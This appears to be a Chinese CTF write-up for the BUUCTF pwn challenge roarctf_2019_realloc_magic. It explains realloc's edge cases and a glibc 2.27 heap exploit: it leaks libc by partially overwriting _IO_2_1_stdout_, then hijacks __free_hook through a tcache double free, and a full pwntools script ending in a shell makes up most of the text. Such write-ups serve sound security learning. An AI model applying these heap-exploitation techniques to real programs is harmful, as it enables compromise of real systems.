这道题有点难,第一次遇见这种题目,看了pwnki师傅博客,还看了pwnki师傅博客下的3个师傅博客
https://www.cnblogs.com/luoleqi/p/13415667.html
railgun_探究利用_IO_2_1_stdout_ 泄露libc
BUUCTF-PWN roarctf_2019_realloc_magic
realloc的几个特殊用法(摘自官方WP)
size == 0 ,这个时候等同于free
realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉
利用思路
先将tache填满,然后在释放一个chunk,使其进入unsorted bin
进入unsorted bin后,覆盖为0xx760,这里需要爆破一位
爆出来后,将其IO_write_base的低字节编程0x58,这正好是vtables地址,将其打印出来后,就泄露了libc
泄露完libc后,后面进行前面类似的操作double free然后劫持__free_hook即可
exp
from pwn import * #context.log_level='debug' #p=process('./roarctf_2019_realloc_magic') p=remote('node3.buuoj.cn',29060) def realloc(size, content): p.recvuntil(">> ") p.sendline('1') p.recvuntil("Size? ") p.sendline(str(size)) p.recvuntil("Content? ") p.send(content) def delete(): p.recvuntil(">> ") p.sendline('2') def back(): p.recvuntil(">> ") p.sendline('666') realloc(0x70,'pppp') realloc(0x0,'') realloc(0x100,'pppp') realloc(0x0,'') realloc(0xa0,'pppp') realloc(0x0,'') realloc(0x100,'pppp') for i in range(7): delete() realloc(0x0,'') realloc(0x70,'a') realloc(0x180,b'p'*0x78+p64(0x41)+p8(0x60)+p8(0x47)) realloc(0x0,'') realloc(0x100,'a') realloc(0,'') realloc(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58)) libc_base = u64(p.recvuntil("x7f",timeout=0.1)[-6:].ljust(8,b'x00'))-0x3e82a0 # _IO_2_1_stderr_+216 store _IO_file_jumps if libc_base==-0x3e82a0: exit(1) print(hex(libc_base)) libc=ELF('../libc-2.27.so') free_hook=libc_base+libc.sym['__free_hook'] system = libc_base + libc.sym['system'] one_gadget=libc_base + 0x4f322 p.sendline('666')#ptr=NULL realloc(0x120,'a') realloc(0,'') realloc(0x130,'a') realloc(0,'') realloc(0x170,'a') realloc(0,'') realloc(0x130,'p') for i in range(7): delete() realloc(0,'') realloc(0x120,'p') realloc(0x260,b'p'*0x128+p64(0x41)+p64(free_hook-8)) realloc(0x0,'') realloc(0x130,b'p') realloc(0,'') realloc(0x130,b'/bin/shx00'+p64(system)) delete() #gdb.attach(p) p.interactive()